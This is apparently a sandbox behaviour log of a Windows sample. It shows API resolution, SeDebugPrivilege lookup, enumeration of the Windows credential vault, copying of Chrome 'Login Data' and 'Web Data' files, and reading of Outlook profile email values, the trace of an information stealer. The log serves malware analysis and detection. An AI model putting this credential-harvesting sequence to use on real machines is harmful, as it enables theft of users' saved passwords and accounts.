Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77375998	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77342251	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x773428f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76b99aa9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x76b4eb4e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x76b538ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x76b48d0f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeConditionVariable, address_out = 0x773d5a7b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x773545a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76b418be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x7738334e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77361801	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77383324	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x76b423f5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x76b489f2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x773426a9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x77342111	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x76b6ebc6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76b453a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260	1	Fn
Environment	Get Environment String	-	1	Fn Data
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Load	module_name = vaultcli.dll, base_address = 0x73940000	1	Fn
Module	Get Address	module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x73943099	1	Fn
Module	Get Address	module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateVaults, address_out = 0x73942945	1	Fn
Module	Get Address	module_name = c:\windows\system32\vaultcli.dll, function = VaultFree, address_out = 0x73944321	1	Fn
Module	Get Address	module_name = c:\windows\system32\vaultcli.dll, function = VaultGetItem, address_out = 0x73943242	2	Fn
Module	Get Address	module_name = c:\windows\system32\vaultcli.dll, function = VaultOpenVault, address_out = 0x739426a9	1	Fn
Module	Get Address	module_name = c:\windows\system32\vaultcli.dll, function = VaultCloseVault, address_out = 0x73942718	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Open credential vault	-	1	Fn
System	Enumerate credential vault items	-	1	Fn
System	Open credential vault	-	1	Fn
System	Enumerate credential vault items	-	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = EnterCriticalSection, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = LeaveCriticalSection, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = InitializeCriticalSection, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = CloseHandle, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = DeleteCriticalSection, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = SetEvent, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = ResetEvent, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = WaitForSingleObjectEx, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = CreateEventW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetModuleHandleW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = IsDebuggerPresent, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetStartupInfoW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = IsProcessorFeaturePresent, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = QueryPerformanceCounter, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetCurrentProcessId, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetCurrentThreadId, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = InitializeSListHead, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetCurrentProcess, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = TerminateProcess, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = WideCharToMultiByte, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = EncodePointer, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = DecodePointer, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = MultiByteToWideChar, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = SetLastError, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = InitializeCriticalSectionAndSpinCount, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = TlsAlloc, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = TlsGetValue, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = TlsSetValue, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = TlsFree, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = LCMapStringW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetLocaleInfoW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetStringTypeW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetCPInfo, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetLastError, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = FreeLibrary, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = LoadLibraryExW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = RaiseException, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = InterlockedFlushSList, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = RtlUnwind, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = ExitProcess, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetModuleHandleExW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetModuleFileNameA, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = HeapAlloc, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = HeapReAlloc, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = HeapFree, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetACP, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetStdHandle, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetFileType, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = IsValidLocale, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetUserDefaultLCID, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = EnumSystemLocalesW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = FindClose, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = FindFirstFileExA, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = FindNextFileA, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = IsValidCodePage, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetOEMCP, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetCommandLineA, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetCommandLineW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetEnvironmentStringsW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = FreeEnvironmentStringsW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetProcessHeap, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = FlushFileBuffers, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = WriteFile, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetConsoleCP, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = GetConsoleMode, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = ReadFile, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = SetFilePointerEx, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = SetStdHandle, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = HeapSize, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = WriteConsoleW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = ReadConsoleW, ordinal = 0, address_out = 0x22fbb4	1	Fn
Module	Get Address	function = CreateFileW, ordinal = 0, address_out = 0x22fbb4	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:26 (UTC)	1	Fn
System	Get Time	type = Performance Ctr, time = 27275320203	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76b418be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x773545a5	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x76b61f61	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76b63879	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x76b59601	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x76b124d8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76b4db8b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76b42111	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76b4b009	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x773589be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7734c02a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7734c0d2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76b43f78	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77358bfb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7734b567	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77375998	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77342251	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x773428f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76b99aa9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x76b4eb4e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x76b538ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x76b48d0f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeConditionVariable, address_out = 0x773d5a7b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x773545a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76b418be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x7738334e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77361801	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77383324	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x76b423f5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x76b489f2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x773426a9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x77342111	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x76b6ebc6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76b453a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260	1	Fn
Environment	Get Environment String	-	1	Fn Data

Thread 0x684

164

Category	Operation	Information	Count	Logfile
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Copy	source_filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data, destination_filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Copy	source_filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data, destination_filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0c8c9c3ec3550644a047b86a8ec12a8b	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0c8c9c3ec3550644a047b86a8ec12a8b	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\1b84e156774e864ab4a15c6403c9f6e3	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\1b84e156774e864ab4a15c6403c9f6e3	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2970052ff0fefa4086a30daf18dd86cf	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2970052ff0fefa4086a30daf18dd86cf	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8fe7ac01aa79754a8f735e7cc12f5d47	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8fe7ac01aa79754a8f735e7cc12f5d47	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = Email, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, type = REG_NONE	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1	Fn
